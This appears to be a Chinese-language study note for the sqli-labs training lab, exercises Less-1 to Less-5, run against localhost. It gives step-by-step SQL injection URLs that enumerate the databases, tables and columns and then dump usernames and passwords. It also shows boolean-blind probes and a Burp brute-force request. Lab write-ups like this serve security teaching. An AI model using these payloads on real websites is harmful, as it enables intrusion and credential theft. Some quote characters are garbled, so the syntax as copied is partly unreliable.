sql-labs
查库: select schema_name from information_schema.schemata
查表: select table_name from information_schema.tables where table_schema=‘security’
查列: select column_name from information_schema.columns where table_name=‘users’
查字段:select username,password from security.users
less-01~04:
SELECT * FROM users WHERE id=‘1’ LIMIT 0,1;
select SELECT
limit 0,1; 其中第一位是从第几个开始,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据。
- http://127.0.0.1/sqli/Less-1/?id=1’ 查看是否有注入
- http://127.0.0.1/sqli/Less-1/?id=1‘ order by 3–+ 查看有多少列
- http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,3–+ 查看哪些数据可以回显
- http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,database()–+ 查看当前数据库
- http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,schema_name from information_schema.schemata limit 4,1–+ 查看数据库security,或者是: http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata–+ 查看所有的数据库
- http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1–+ 查表,或者是:http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479–+ 查看所有的
- http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,column_name from information_schema.columns where table_name=0x7573657273–+ 查询列信息,或者是:http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273–+ 查看所以的列信息
- http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,concat_ws(’~‘,username,password) from security.users limit 1,1–+ 查询一个账号和密码,或者是:http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+ 直接可以得到所有的账号和密码,并且使用~符号进行分割。
less-05 - http://127.0.0.1/sqli/Less-5/?id=1’ 查看是否有注入
- http://127.0.0.1/sqli/Less-5/?id=1’ order by 3–+ 查看有多少列
- http://127.0.0.1/sqli/Less-5/?id=1‘ and left((select database()),1)=’s’–+ 判断第一位是否是s,然后使用bp进行爆破处理:
GET /sqli/Less-5/?id=1%27%20and%20left((select%20database()),2)=%27s§a§%27–+ HTTP/1.1
通过返回的长度来确定第二位是多少,最后确定为e,依次类推进行测试。 - 或者是使用if来进行判断测试: http://127.0.0.1/sqli/Less-5/?id=1‘ and ascii(substr((select database()),1,1))>156–+(此时是没有返回的) (这种方法是错误的)
http://127.0.0.1/sqli/Less-5/?id=1‘ and ascii(substr((select database()),1,1))>110–+ 此时返回 you are in…….代表执行成功。